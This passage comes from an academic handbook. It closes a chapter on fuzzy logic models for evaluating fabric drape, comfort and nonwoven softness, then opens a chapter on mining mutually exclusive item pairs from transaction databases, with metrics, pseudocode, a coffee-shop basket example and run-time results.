the K-nearest neighbor method with fuzzy linear clustering improved the prediction accuracy for fabric drape. For the purpose of evaluating apparel comfort, four types of fuzzy comprehensive evaluation models were reviewed. Model (•, ⊕) was used to assess six different fabrics for three different end uses. The implementation of this model evaluation indicated that the approach of fuzzy comprehensive evaluation was useful for assessing the appropriateness of a specific fabric for a specific end use based on instrumental testing for the fabric’s critical physical properties and on the acquisition of the consumer’s preference for apparel comfort. From the present study, we could conclude that plain wool fabric was better than twill wool fabric for making blouses, slacks, and underpants because plain wool fabric has a higher fuzzy comprehensive value. Similarly, plain cotton fabric was preferred to twill cotton fabric for the end uses of blouses, slacks, and underpants. Plain silk fabric was the best among those six types of fabric for the three end uses because of its highest fuzzy comprehensive values. In the case of grading nonwoven softness using the method of fuzzy neural network computing, the neuro-fuzzy model CANFIS was selected to perform machine learning for the two targeted polypropylene spunbond nonwovens after inputting their mechanical property data (KES-FB instrument data). The trained neuro-fuzzy model was then applied to evaluate the softness of six spunbond nonwoven samples made from commercial polypropylene. The model cross-validation revealed that the model MSE was 0.0096. This neuro-fuzzy model was able to produce a numerical value between 0 and 1 for grading nonwoven softness. It should be noted that there were some limitations throughout this research. First, the three fuzzy applications were three individual cases based on different data sets. The fabric database introduced was used only for the establishment of fuzzy clustering models for evaluating fabric
drape and tailorability. Second, the number of samples in each data set was limited, particularly, in the data sets for the second and third cases. This might affect the universal representativeness for those established fuzzy models. Finally, all the fuzzy computing procedures discussed in the above cases were separated and were not integrated into a single computer program package. Further research is needed to advance the progress of the fuzzy computing techniques for textile applications. Recommended future work is described below. The volume of the current fabric database needs to be increased so that it can include different fabric types from wovens to nonwovens, and different fabric properties from durability to aesthetics. By expanding this fabric database, we are able to develop an integrated computer program package capable of running not only the fuzzy clustering methods, but also the basic fuzzy comprehensive models discussed and the neurofuzzy hybrid approach introduced. In this way, end users may have several choices to implement different fuzzy evaluation procedures upon their different application needs. Additionally, the Webbased database architecture also needs enhancing to allow all the fuzzy evaluation procedures to be accessible through the Internet. Further experiment and validation will be carried out about the capability of the fuzzy clustering methods for establishing new search engines for the fabric database. Special interests include the use of fuzzy linear clustering for discovering new patterns among fabric properties, the application of the fuzzy C-means algorithm for fabric classification and query answering, and the development of hybrid approaches for combining fuzzy methods with decision-tree learning to predict fabric appearance and tailorability. Furthermore, the fuzzy clustering and query-answering method will be compared to the fSQL approach so as to find more effective ways to incorporate these two approaches for different applications.
2187
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
ACKNOWLEDGMENT The authors would like to acknowledge their special thanks to the following individuals and organizations for all the assistance they have rendered in the course of this research work: Professor Sukhamay Kundu for helpful discussions on topics related to this work and for his permission to use his program for fuzzy linear clustering; Dr. Jackie Robeck from the University of Louisiana at Lafayette for providing fabric tailorability data; Sreeram Vuppala, Bin Zhang, Ayse Gilder, and Ting Zhang of Louisiana State University for their assistance in the implementation of the online fabric database and the acquisition of the fabric property data; Dr. Billie J. Collier and Zuopang Li of the University of Tennessee for providing experimental nonwoven samples; and finally, to the Louisiana Board of Regents and ExxonMobil Chemical Company for financial support. This work is also partially supported by the NSF grant ITR-0326387 and AFOSR grants FA9550-05-1-0454, F49620-03-1-0238, F4962003-1-0239, and F49620-03-1-0241.
REFERENCES Barrett, G. R., Clapp, T. G., & Titus, K. J. (1996). An on-line fabric classification technique using a wavelet-based neural network approach. Textile Research Journal, 66, 521-528. Bezdek, J. C. (1980). A convergence theorem for the fuzzy ISODATA clustering algorithms. IEEE Transactions on Pattern Analysis and Machine Intelligence, 2, 1-8. Brand, R. H. (1964). Measurement of fabric aesthetics: Analysis of aesthetic components. Textile Research Journal, 34, 791-804. Chang, K. P., & Tae, J. K. (1997). Objective rating of seam pucker using neural networks. Textile Research Journal, 67, 494-502. 2188
Chen, J., Chen, Y., Zhang, B., & Gider, A. (2002). Fuzzy linear clustering for fabric selection from online database. In J. Keller & O. Nasraoui (Eds.), 2002 Annual Meeting of the North American Fuzzy Information Processing Society Proceedings (pp. 518-523). Piscataway, NJ: IEEE. Chen, J., & Kundu, S. (1999). Fuzzy control system design by fuzzy clustering and self-organization. In Proceedings of NAFIPS’96 Conference. Berkeley, CA: IEEE. Chen, P. W., Liang, T., Yau, H., & Lin, H. C. (1998). Classifying textile faults with a back-propagation neural network using power spectra. Textile Research Journal, 68, 121-126. Chen, Y., & Collier, B. J. (1997). Characterizing fabric end-use by fabric physical properties. Textile Research Journal, 67, 247-252. Chen, Y., Collier, B. J., & Collier, J. R. (1999). Application of cluster analysis to fabric classification. International Journal of Clothing Science and Technology, 11, 206-215. Chen, Y., Collier, B. J., Hu, P., & Quebedeaux, D. (2000). Objective evaluation of fabric softness. Textile Research Journal, 70, 443-448. Chen, Y., Zhao, T., & Collier, B. J. (2001). Prediction of fabric end-use using a neural network technique. Journal of Textile Institute, 92, 157-163. Chen, Y., Zhao, T., & Turner, B. (2001). A new computerized data acquisition and analysis system for KES-FB instruments. Textile Research Journal, 71, 767-770. Chen, Y. Y., Liu, Y. F., & Wang, P. Z. (1983). Models of multifactorial evaluation. Fuzzy Mathematics, 1, 61-70. Cheng, L., & Adams, D. L. (1995). Yarn strength prediction using neural network. Textile Research Journal, 65, 495-500. Dilworth, D. (2007). For first time, apparel outsells computers online: Shop.org. DMNEWS. Retrieved
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
May 22, 2007, from http://www.dmnews.com/ cms/trackback/41082-1 Dorrity, J. L., Vachtsevanos, G. J., & Jasper, W. (1996). Real time fabric defect detection and control in weaving processes (Tech. Rep. No. G94-2). Wilmington, DE: National Textile Center. Ellis, B. C. & Garnsworthy, R. K. (1980). A review of techniques for the assessment of hand. Textile Research Journal, 50, 231-238. Galindo, J., Urrutia, A., & Piattini, M. (2006). Fuzzy databases: Modeling, design, and implementation. Hershey, PA: Idea Group Publishing.
Kemp, T., & Lewis, D. (2000). Retail site pushes Web envelope. InternetWeek. Retrieved September 8, 2000, from http://www.internetwk. com/lead/lead090800.htm Kim, J. J., Shalev, I., & Barker, R. L. (1994). Softness properties of paper towels. TAPPI Journal, 77, 83-89. Kundu, S., & Chen, J. (1994). Fuzzy linear invariant clustering with applications in fuzzy control. In Proceedings of the North American Fuzzy Information Processing Society (NAFIPS) Biannual Conference (pp. 196-200). Piscataway, NJ: The Institute for Electrical and Electronics Engineers (IEEE).
Gong, R. H., & Chen, Y. (1999). Predicting the performance of fabrics in garment manufacturing with artificial neural networks. Textile Research Journal, 69, 447-482.
Kuo, C. J., & Lee, C. (2003). A back-propagation neural network for recognizing fabric defects. Textile Research Journal, 73, 147-151.
Hathaway, R. J., & Bezdek, J. C. (1993). Switching regression models and fuzzy clustering. IEEE Transactions on Fuzzy Systems, 1, 195-204.
Kuo, C. J., Shih, C., Kao, C., & Lee, J. (2005). Color and pattern analysis of printed fabric by an unsupervised clustering method. Textile Research Journal, 75, 9-12.
Hearle, J. W. S. (1993a). Can fabric hand enter the dataspace? Part I. Textile Horizons, 14-17. Hearle, J. W. S. (1993b). Can fabric hand enter the dataspace? Part II: Measuring the unmeasurable? Textile Horizons, 16-20. Howorth, W. S. (1964). The handle of suiting, lingerie, and dress fabrics. Journal of Textile Institute, 55, T251-T260. Jang, J. R., Sun, C., & Mizutani, E. (1997). Neurofuzzy and soft computing. Upper Saddle River, NJ: Prentice-Hall, Inc. Kawabata, S., & Niwa, M. (1989). Fabric performance in clothing manufacture. Journal of Textile Institute, 80, 19-50. Kawabata, S., Niwa, M., & Wang, F. (1994). Objective hand measurement of nonwoven fabrics. Textile Research Journal, 64, 597-610.
Kuo, C. J., Shih, C., & Lee, J. (2004). Automatic recognition of fabric weave patterns by a fuzzy c-means clustering method. Textile Research Journal, 74, 107-111. Lindeman, H. R., Merenda, P. F., & Gold, R. Z. (1980). Introduction to bivariate and multivariate analysis. Glenview, IL: Scott, Foresman and Company. Mikulcic, A., & Chen, J. (1996). Experiments on application of fuzzy clustering in fuzzy system design. In Proceedings of FUZZ IEEE 1996. New Orleans, LA: The Institute for Electrical and Electronics Engineers (IEEE). Pan, N., Yen, K. C., Zhao, S. J., & Yang, S. R. (1988a). A new approach to the objective evaluation of fabric handle from mechanical properties: Part I. Objective measure for total handle. Textile Research Journal, 58, 438-444.
2189
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
Pan, N., Yen, K. C., Zhao, S. J., & Yang, S. R. (1988b). A new approach to the objective evaluation of fabric handle from mechanical properties: Part II. Objective measure for primary handle. Textile Research Journal, 58, 531-537.
Sabharwal, J., & Chen, J. (1996). Intelligent pH control using fuzzy linear invariant clustering. In Proceedings of Southeastern IEEE Symposium on Systems Theory (pp. 514-518). Baton Rouge, LA: IEEE.
Pan, N., Yen, K. C., Zhao, S. J., & Yang, S. R. (1988c). A new approach to the objective evaluation of fabric handle from mechanical properties: Part III. Fuzzy cluster analysis for fabric handle sorting. Textile Research Journal, 58, 565-571.
Sarimveis, H., & Retsina, T. (2001). Tissue softness prediction using neural network methodologies: Such tools can improve productivity and minimize out-of-spec production. Pulp and Paper Canada, 102, 42-45.
Postle, R., & Mahar, T. J. (1982). Basic requirements for an international objective measurement programme for wool fabric quality. In S. Kawabata, R. Postle, & M. Niwa (Eds.), Objective specification of fabric quality, mechanical properties and performance (pp. 1-22). Osaka, Japan: The Textile Machinery Society of Japan.
SAS Institute Inc. (1990). SAS/STAT user’s guide, version 6 (4th ed.). Cary, NC: SAS Institute Inc.
Principe, J. C., Euliano, N. R., & Lefebvre, W. C. (2000). Neural and adaptive systems: Fundamentals through simulations. New York: John Wiley & Sons, Inc. Pynckels, F., Kiekens, P., Sette, S., Langenhove, L. V., & Impe, K. (1995). Use of neural nets for determining the spinnability of fibres. Journal of Textile Institute, 86, 425-437. Raheel, M., & Liu, J. (1991). An empirical model for fabric hand: Part I. Objective assessment of light weight fabrics. Journal of Textile Institute, 61, 31-38. Rong, G. H., & Slater, K. (1992). A new approach to the assessment of textile performance. Journal of Textile Institute, 83, 197-208. Rudie, R. (1996). Denim does spring. Bobbin, 34-37. Rust, J. P., Keadle, T. L., Allen, D. B., & Barker, R. L. (1994). Tissue softness evaluation by mechanical stylus scanning. Textile Research Journal, 64, 163-168.
2190
Wang, G. Y. (1984). On the essence and application of models of comprehensive evaluations. Fuzzy Mathematics, 4, 81-88.
KEY TERMS Artificial Neural Network (ANN): ANN is a computing paradigm that loosely simulates cortical structures of the brain. The simplest element of ANN is called a processing element, or node. Soft computing techniques are used to develop different types of ANN models based on different processing elements. Bounded Sum: Denoted by the symbol ⊕, it is defined a s α ⊕ β = min(1, α + β) or α ⊕ β = (α + β) ∧ 1. Here, ⊕ denotes and in Boolean algebra. Drapability: It is the ability of a fabric to form pleating folds when deformed under its own weight. Durability: Durability is a denotation for textile and apparel quality features related to product reliability. These features include the change of tensile strength, tear strength, abrasion resistance, colorfastness, and cracking and bursting strength during service life.
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
Eigenvalue: It is a solution derived from a vector-characteristic equation, representing a variance of a main effect. Fabric Drape Coefficient: It is a ratio of a projected pleating fold area formed by a piece of fabric after draping under its own weight to the original area of this piece of fabric without draping. The higher the fabric drape coefficient, the lower the fabric drapability. Fabric Performance: Fabric performance is a general term to implicate fabric end-use properties regarding durability, comfort, and aesthetics. Typical fabric properties like breakage and abrasion, heat and moisture transport, hand and drape, and pattern and color are among those end-use properties. Fuzzy Clustering: It is a family of clustering methods that partition a set of given data objects into (nondisjoint) fuzzy clusters. Each fuzzy cluster is a fuzzy set, and each object’s membership degree in all the clusters sum up to one. Fuzzy Linear Clustering: It is a fuzzy clustering method in which the prototype for each
fuzzy cluster is a linear function of the input variables. Fuzzy Set: A fuzzy set is a generalization of an ordinary (crisp) set. A fuzzy set S allows an element to have partial degree (between zero and one) of membership in S. Pure Bending Tester: It is an instrument for measuring fabric pure flexural deformation. Shear Tester: It is an instrument for measuring fabric in-plane shear deformation. Softness: Softness is a type of fabric touch feeling by a human’s hand related to fabric bulky, flexible, and springy properties. Spunbond: Spunbond is a specific nonwoven web-forming process by extruding, drawing, and laying synthetic filament fiber on a convey belt for fiber collection. Tailorability: It is the ease of converting a piece of 2-D fabric into a required piece of 3-D garment component. Yarn Interlacing: It is a method of forming woven fabrics by weaving two sets of yarns.
This work was previously published in Handbook of Research on Fuzzy Inforamtion Processing in Databases, edited by J. Galindo, pp. 538-562, copyright 2008 by Information Science Reference (an imprint of IGI Global).
2191
2192
Chapter 7.14
Mining for Mutually Exclusive Items in Transaction Databases George Tzanis Aristotle University of Thessaloniki, Greece Christos Berberidis Aristotle University of Thessaloniki, Greece
ABSTRACT
INTRODUCTION
Association rule mining is a popular task that involves the discovery of co-occurences of items in transaction databases. Several extensions of the traditional association rule mining model have been proposed so far; however, the problem of mining for mutually exclusive items has not been directly tackled yet. Such information could be useful in various cases (e.g., when the expression of a gene excludes the expression of another), or it can be used as a serious hint in order to reveal inherent taxonomical information. In this article, we address the problem of mining pairs of items, such that the presence of one excludes the other. First, we provide a concise review of the literature, then we define this problem, we propose a probability-based evaluation metric, and finally a mining algorithm that we test on transaction data.
Association rules are expressions that describe a subset of a transaction database. When mining for such patterns, it is quite often that we come up with a large number of rules that appear to be too specific and not very interesting. A rule that relates two specific products in a market basket database is not very likely to be really strong compared to a rule that relates two groups or two families of products. Hierarchical relationships among items in a database can be used in order to aggregate the weak, lower-level rules into strong, higher-level rules, producing hierarchical, multiple level, or generalized association rules. However, such information is not always explicitly provided, although it might exist. Mining for taxonomies is a really challenging task that, to the best of our knowledge, has not been approached yet. Taxonomies are conceptual
Mining for Mutually Exclusive Items in Transaction Databases
hierarchies, implemented by is-a relationships. The discovery of such relationships would involve the complete description and formulation of concepts that are more general or more specific than others. To learn taxonomies from data implies the automatic extraction of human concepts from the data, with the use of an algorithm. To our understanding, this is virtually impossible. However, we believe that when mining for various types of patterns, one can get serious hints about possible hierarchical relationships. Let us say, for instance, that a supermarket customer is vegetarian. Then it would be really rare for this customer to buy both veggie burgers and red meat. It seems that the two products exclude each other. When one of them is present, then the probability to also find the other one is very low. Motivated by that observation, we propose a method for mining for mutually exclusive items. Such information is also useful regardless of its use as a taxonomy clue. In this article, we define the problem of mining for mutually exclusive items. We propose a probability-based mutual exclusion metric and a mining algorithm that we test on transaction data. The article is organized as follows. The next section presents the required background knowledge. This is followed by a short review of the relative literature. The next section contains the description of the proposed approach, definitions of terms and notions used, the proposed algorithm, a novel metric for measuring the mutual exclusion, and an illustrative example of our approach. Next we present our experiments, and then we discuss the presented approach. The final section contains our conclusions and our ideas for future research.
PRELIMINARIES The association rules mining paradigm involves searching for co-occurrences of items in transaction databases. Such a co-occurrence may imply a relationship among the items it associates. These
relationships can be further analyzed and may reveal temporal or causal relationships, behaviors, and so forth. The formal statement of the problem of mining association rules can be found in Agrawal, Mannila, Srikant, Toivonen, and Verkamo (1996). Given a finite multiset of transactions D, the problem of mining association rules is to generate all association rules that have support and confidence at least equal to the user-specified minimum support threshold (min_sup) and minimum confidence threshold (min_conf ), respectively. The problem of discovering all the association rules can be decomposed into two subproblems (Agrawal, Imielinski, & Swami, 1993): 1.
2.
The discovery of all itemsets that have support at least equal to the user-specified min_sup threshold. These itemsets are called large or frequent itemsets. The generation of all rules from the discovered frequent itemsets. For every frequent itemset F, all nonempty subsets of F are found. For every such subset S, a rule of the form S⇒F-S is generated, if the confidence of the rule is at least equal to the user-specified min_conf threshold.
Another method to extract strong rules is the use of concept hierarchies, also called taxonomies, that exist in various application domains, such as market basket analysis. Taxonomy is a concept tree, where the edges represent is-a relationships from the child to the parent. An example of such a relationship is: “Cheddar is-a cheese is-a dairy product is-a food is-a product.” When a taxonomy about a domain of application is available, a number of usually high-confidence rules that are too specific (having low support) can be merged, creating a rule that aggregates the support and, therefore, the information, in a higher abstraction level of the individual rules. In other words, “looser” associations at the lower levels of the taxonomy are summarized, producing “winner”
2193
Mining for Mutually Exclusive Items in Transaction Databases
associations of higher levels. For example, the rule “if a customer buys 0.5 lb. wheat bread then he/she also buys 1 lb. skimmed milk” is very likely to have low support, while a rule “if a customer buys bread then he/she also buys milk” is very possible that it has much higher support, because it includes all types, brands, and packages of bread and milk bought by the store’s customers.
RELATED WORK Association rules were first introduced by Agrawal et al. (1993) as a market basket analysis tool. Later, Agrawal and Srikant (1994) proposed an Apriori, a level-wise algorithm, which works by generating candidate itemsets and testing if they are frequent by scanning the database. Apriori exploits the downward closure property, according to which any nonempty subset of a frequent itemset is also frequent. Therefore, at each level, the candidate frequent itemsets are generated based only on the frequent itemsets found in the previous level. About the same time, Mannila, Toivonen, and Verkamo (1994) discovered independently the same property and proposed a variation of Apriori, the OCD algorithm. A joint paper combining the previous two works was later published (Agrawal et al., 1996). Several algorithms have been proposed since then, others improving the efficiency, such as FPGrowth (Han, Pei, & Yin, 2000) and others addressing different problems from various application domains, such as spatial (Koperski & Han, 1995), temporal (Chen & Petrounias, 2000), and intertransactional rules (Tung, Lu, Han, & Feng, 2003), which can be also used for prediction (Berberidis, Agelis, & Vlahavas, 2004). One of the major problems in association rules mining is the large number of often uninteresting rules extracted. Srikant and Agrawal (1995) presented the problem of mining for generalized association rules. These rules utilize item taxonomies in order to discover more interesting rules.
2194
For example, given that “Gouda is-a cheese” and “cheddar is-a cheese,” we discover a rule, such as “if a customer buys bread then he/she also buys cheese,” with support higher than of a rule for a specific cheese. The authors propose a basic algorithm as well as three more efficient algorithms, along with a new interestingness measure for rules, which uses information in the taxonomy. Thomas and Sarawagi (1998) propose a technique for mining generalized association rules based on SQL queries. Han and Fu (1995) also describe the problem of mining “multiple-level” association rules, based on taxonomies and propose a set of top-down progressive deepening algorithms. Teng (2002) proposes a type of augmented association rules, using negative information called dissociations. A dissociation is a relationship of the form “X does not imply Y,” but it could be that “when X appears together with Z, this implies Y.” Han and Fu (1994) propose some algorithms for dynamic refinement and dynamic generation of concept hierarchies. The generation of concept hierarchies concerns only numerical attributes and is based on data distribution. The dynamic refinement of a given or even a generated concept hierarchy is based on a particular learning request, the relevant set of data, and database statistics. Another kind of association rules are negative association rules. Savasere, Omiecinski, and Navathe (1998) introduced the problem of mining for negative associations. Negative associations deal with the problem of finding rules that imply what items are not likely to be purchased, when a certain set of items is purchased. The approach of Savasere et al. (1998) demands the existence of a taxonomy and is based on the assumption that items belonging to the same parent of taxonomy are expected to have similar types of associations with other items. Since they consider only those cases where the expected support can be calculated based on the taxonomy, only a subset of the whole set of negative association rules can be discovered. The authors propose a naive and an improved algorithm for mining negative
Mining for Mutually Exclusive Items in Transaction Databases
association rules, along with a new measure of interestingness. In a more recent work, Wu, Zhang, and Zhang (2004) present an efficient method for mining positive and negative associations, and propose a pruning strategy and an interestingness measure. Their method extends the traditional positive association rules (A ⇒ B) to include negative association rules of the form A ⇒ –B, –A ⇒ B, and –A ⇒ –B. (The minus sign means not.) The last three rules indicate negative associations between itemsets A and B. A mutual exclusion cannot be expressed by one such rule. If items a and b are mutually exclusive, then {a} ⇒ –{b} and {b} ⇒ –{a}, concurrently, that is different from –{a} ⇒ –{b}.
MINING FOR MUTUALLY EXCLUSIVE ITEMS In this section we describe our approach for discovering mutually exclusive items. Specifically, in subsection 4.1, we attempt to define the concept of mutual exclusion and we describe the intuition behind our approach. In subsection 4.2, we present the task of mining for contiguous frequent itemsets, which are a basic part of our approach. In section 4.3, we describe the metrics used for evaluating candidate pairs of mutually exclusive items and the algorithm for mining them. Finally, in subsection 4.4, we provide an illustrative example of our approach.
Problem Definition •
Definition 1: Let D be a finite multiset of transactions and I be a finite set of items. Each transaction T∈D is a set of items such that T⊆I. If two items i1∈I and i2∈I are mutually exclusive, then there is not any transaction T∈D, such that {i1, i2}⊆T.
The above definition of mutual exclusion is strict. However, the inverse of Definition 1 does
not generally stand, so it cannot be used to identify mutually exclusive items. Consider the database of a large store containing more than 10,000 items and millions of transactions; it is possible that there is a large number of pairs of items that are never purchased together. According to the inverse of Definition 1, all of these pairs of items are mutually exclusive. But, in fact, only a very small number of them are truly mutually exclusive. Based on the notions explained so far, we propose an algorithm for mining for mutually exclusive items in a transaction database, and we focus on its application on market basket data. The mutual exclusion of two database items could imply an alternative type of association. Of course, this kind of mined knowledge needs to be confirmed by the domain expert so that it can be utilized eventually. A point that has also to be stressed is that although we perform a sort of causality analysis (The existence of an item excludes or “causes the nonexistence of” another.), this is not what we aim for. Our goal is to discover items that never or rarely appear together under certain conditions that are explained below. Mining for mutually exclusive items in a database possibly containing several thousand different items involves searching in a space that consists of all the possible pairs of items, because virtually any of them could contain two items that exclude each other. However this approach is naive and simplistic and can lead to many mutually exclusive items that, in fact, are not, as explained above. We propose a more intuitive approach, which is based on the assumption/observation that every frequent itemset expresses a certain behavior of a group of customers, and, therefore, it could be used to guide our search. Items that appear with high frequency in the subspace of a frequent itemset are more likely to be systematically mutually exclusive, because they follow a customer behavioral pattern and not because of pure chance or unusual cases. However, we cover these cases with an extra pass over the database in order to remove the candidate mutually exclusive
2195
Mining for Mutually Exclusive Items in Transaction Databases
Figure 1. The three steps of our approach
Step 1 Database
Frequent Itemsets
pairs that for any reason are not confirmed by the transactions. Our approach consists of three steps (Figure 1). In the first step, all the frequent itemsets are mined. Then, the frequent itemsets are used for mining the contiguous frequent itemsets, producing the extensions that will be used in the next step as candidate mutually exclusive items. Any frequent itemset mining algorithm can be used in the first step. Step 2 works in a level-wise manner like Apriori and requires a number of scans over the database, which is proportional to the size of the extensions discovered. In the case of the basic Apriori algorithm, the number of scans is equal to the size of the itemsets, but there are some improvements in later versions that require fewer scans that are more efficient. The extensions of the contiguous frequent itemsets mined at the second step are candidates for participating in a pair of mutually exclusive items.
Mining for Contiguous Frequent Itemsets In the following lines we provide some definitions and formulate the problem of mining contiguous frequent itemsets as defined in previous work (Berberidis, Tzanis, & Vlahavas, 2005). Let D be a finite multiset of transactions and I be a finite set of items. Each transaction T∈D is a set of items such that T⊆I. Mining for frequent k-itemsets involves searching in a search space, which consists of all the possible combinations of
2196
Contiguous Frequent Itemsets
Step 2
Step 3
Mutually Exclusive Items
length k of all items in I. Every frequent itemset F⊆I divides the search space in two disjointed subspaces. The first consists of the transactions that contain F and from now on will be called the F-subspace and the second includes all of the other transactions. •
Definition 2: Let F⊆I be a frequent itemset in D, according to a first-level support threshold and E⊆I be another itemset. The itemset F∪E is considered to be a contiguous frequent itemset, if F∩E=∅, and E is frequent in the F-subspace, according to a second-level support threshold.
Itemset E is called the locally frequent extension of F. The term locally is used, because E may not be frequent in the whole set of transactions. In order to avoid any confusion, from now on we will use the terms local and locally, when we refer to a subset of D and the terms global and globally when we refer to D. For example, we call global support (gsup) the first-level support and local support (lsup) the second-level support. An itemset F that satisfies the minimum gsup threshold (min_gsup) is considered to be globally frequent, and an itemset E that is frequent in the F-subspace, according to the minimum lsup threshold (min_lsup), is considered to be locally frequent. The local support of an itemset E in the F-subspace can be calculated as with Equation 1.
Mining for Mutually Exclusive Items in Transaction Databases
lsup( E , F ) =
gsup( E ∪ F ) gsup( F )
LM I ( A, B ) =
(1)
The lsup threshold can be set arbitrarily by the user-expert or can be the same as the gsup threshold. The contiguous frequent itemsets that contain a locally frequent extension of length k are called k-contiguous frequent itemsets. Given a finite multiset of transactions D, the problem of mining contiguous frequent itemsets is to generate all itemsets F∪E that consist of an itemset F that has gsup at least equal to the user-specified minimum global support threshold and an extension E that has local support at least equal to the user-specified minimum local support threshold.
MUTUAL EXCLUSION METRICS AND MINING ALGORITHM In order to distinguish when two items are mutually exclusive, we need a measure to evaluate the degree of the mutual exclusion between them. Initially, we should be able to evaluate this within the subspace of a frequent itemset (locally), and then it should be evaluated globally, with all the frequent itemsets that support this candidate pair to contribute, accordingly. For this purpose, we propose the use of a metric we call the mutual exclusion metric (MEM) that can be calculated in two phases; the first one is local and is required for the second one, which is the global one. Local metric. We propose the following local metric (Equation 2), which will be called Local MEM for the evaluation of a candidate pair of mutually exclusive items that is supported by a frequent itemset I and its range is [0, 1].
⎡⎣ P ( A − B ) + P (B − A )⎤⎦ min ⎡⎣ P ( A − B | A ), P (B − A | B )⎤⎦ = ⎡ (S A - S AB ) (S B - S AB )⎤ , ⎥= ⎣⎡(S A - S AB ) + (S B - S AB )⎦⎤ min ⎢ SA SB ⎣ ⎦ ⎡ ⎤ S AB (S A + S B - 2S AB )⎢1⎥ ⎣⎢ min (S A , S B )⎦⎥
(2)
For the above formula P(I) = 1. SX is the fraction of transactions that contain X over the number of transactions that contain I. Figure 2 shows that the Local MEM increases linearly when the local support of A and B increase, as long as there is no overlapping (SA, SB < 0.5 and SAB = 0), until it reaches its maximum value, which is 1.We assume that SA = SB for simplicity, without any loss of generality. When the overlapping starts (SA, SB > 0.5), it drops quickly to zero, because even a small degree of overlapping is strong evidence against the possibility of two items being mutually exclusive. An illustrative example is depicted in Figure 3. In diagrams (a) and (b), the shadowed areas represent the transactions that support A but not B (or A-B) and B but not A (or B-A), which is the first factor in the Local MEM formula. The second factor in the Local MEM equation is represented A− B B−A by the minimum of A and B . The two items in the diagram (b) are less likely to be mutually exclusive than in (a). Global metric. We propose the following global metric (Equation 3) for the evaluation of a candidate pair of mutually exclusive items that is supported by a set IS of frequent itemsets. ⎛ ⎞ GM 1 ( A, B ) = IIF ⎜ S I LM I ( A, B ) ⎟ ⎝ I ∈IS ⎠
∑
(3)
2197
Mining for Mutually Exclusive Items in Transaction Databases
Figure 3. Venn diagrams
B
A A-B
A
B A-B
B-A
B-A (a)
(b)
Table 1. The mutuallty exclusive items mining algorithm Input: A multiset of transactions D, a minimum global support threshold min_gsup, a minimum local support threshold min_lsup, and a minimum global MEM threshold min_gMEM. Output: All mutually exclusive pairs.
FI ← mineFrequentItemsets(D, min_gsup) for each (T ∈ D) for each (I ∈ FI) if (I ⊆ T) for each (E ∈ T-I) Extensions(I) ← Extensions(I) ∪ E Count[I][E] ← Count[I][E] + 1 for each (I ∈ FI) for each (E ∈ Extensions(I)) if (Count[I][E] < min_lsup) Extensions(I) ← Extensions(I) - E for each (T ∈ D) for each (I ∈ FI) for each (E1, E2 ∈ Extensions(I)) if ({E1, E2} ⊆ T) ExtensionPairs(I) ← ExtensionPairs(I) ∪ {E1, E2} Local_MEM[I][{E1, E2}] ← calculateLocal_MEM(I, {E1, E2}) for each (I ∈ FI) for each (EP ∈ ExtensionPairs(I)) AllExtensionPairs ← AllExtensionPairs ∪ EP for each (EP ∈ AllExtensionPairs) if (Global_MEM(EP) ≥ min_gMEM) MutuallyExclusivePairs ← MutuallyExclusivePairs ∪ EP return MutuallyExclusivePairs
IIF stands for itemset independence factor and is calculated as the ratio of the number of the distinct items contained in all itemsets that support a candidate pair over the total number of items contained in these itemsets. For example, the IIF of the itemsets {A, B, C} and {A, D} is
2198
0.8, since there are four distinct items (A, B, C, and D) over a total of five (A, B, C, A, and D). The IIF is used in order to take into account the possible overlapping of two candidate mutually exclusive items. We do this because the overlapping between the transactions that contain two
Mining for Mutually Exclusive Items in Transaction Databases
different itemsets implies overlapping between the transactions that contain the pair. Alternatively, one can use Equation 4, which is a normalized version of Equation 3. The range of values of GM1 is [0, +∞), while the range of GM2 is [0, 1].
∑ S LM I
GM 2 ( A, B ) = IIF
I
( A, B )
I ∈IS
⎛ ⎞ max ⎜ SI ⎟ IS∈FS ⎝ I ∈IS ⎠
∑
(4)
FS is the set that contains all the sets of frequent itemsets that support a candidate pair of mutually exclusive items. The difference between Equations 3 and 4 is the denominator in Equation 4. This term is used in order to normalize the metric, since the numerator is always less or equal to the denominator. In other words, for each candidate pair we calculate the sum of the supports of the frequent itemsets that support the pair. The greatest sum is used to normalize the metric. This normalization is useful to the user who wants to know Apriori the maximum value of the metric in order to use the proper threshold. However, this is not desirable when the user wants to compare the results of different data sets or the results obtained by running the algorithm with different parameters. The algorithm for mining mutually exclusive pairs of items is presented in Table 1. For the first step, namely the discovery of frequent itemsets, every frequent itemset mining algorithm can be used.
Example The following tables show an illustrative example. Table 2 contains a market basket data set example, and Table 3 the discovered association rules. The minimum support was set to 2/9 in order to extract these rules. After we applied our algorithm, we discovered the mutually exclusive pairs of items shown in Table 4, along with their metrics and corresponding frequent itemsets.
Table 2. A market basket dataset example TID
Items in the basket
1
espresso, sugar, newspaper
2
espresso, sugar, cola
3
espresso, sugar
4
cappuccino, cigarettes
5
cappuccino, sugar
6
cappuccino, sugar, sweets
7
decaf, sugar, chewing_gum
8
decaf, soda, vinegar
9
decaf, sugar, cigarettes
Table 3. Association rules mined from the data set of Table 2 Association rules
Support
Confidence
espresso⇒sugar
3/9
1
decaf⇒sugar
2/9
2/3
cappuccino⇒sugar
2/9
2/3
EXPERIMENTS In order to evaluate the performance of our algorithm, we conducted a number of experiments on an IBM artificial market basket data set (T10I4D100K). This data set contains 100,000 transactions. The graph in Figure 4 illustrates the performance of our mutually exclusive items mining algorithm in means of run time (seconds), while the min_lsup threshold varies from 0.1 to 0.3 and the min_gsup threshold varies from 0.01 to 0.04. As expected, we observe that while the min_lsup threshold and the min_gsup threshold decrease, the run time of the algorithm increases. The performance degrades significantly when the two thresholds are set very low.
2199
Mining for Mutually Exclusive Items in Transaction Databases
Table 4. Mutually exclusive items and their corresponding frequent item sets mined from data set of Table 2 Mutually exclusive pairs (gMEM, gsup)
Frequent item sets Support
Local MEM
{espresso, cappuccino}: 5/9, 0
{sugar}: 7/9
0.714
{espresso, decaf}: 5/9, 0
{sugar}: 7/9
0.714
{cappuccino, decaf}: 4/9, 0
{sugar}: 7/9
0.571
Figure 4. Run time of the mutually exclusive items mining algorithm depending on lsup for four fixed values of gsup 800 700 Run Time (sec)
600
min_gsup = 0.01
500
min_gsup = 0.02
400
min_gsup = 0.03
300
min_gsup = 0.04
200 100 0 0.1
0.15
0.2
0.25
0.3
min_lsup
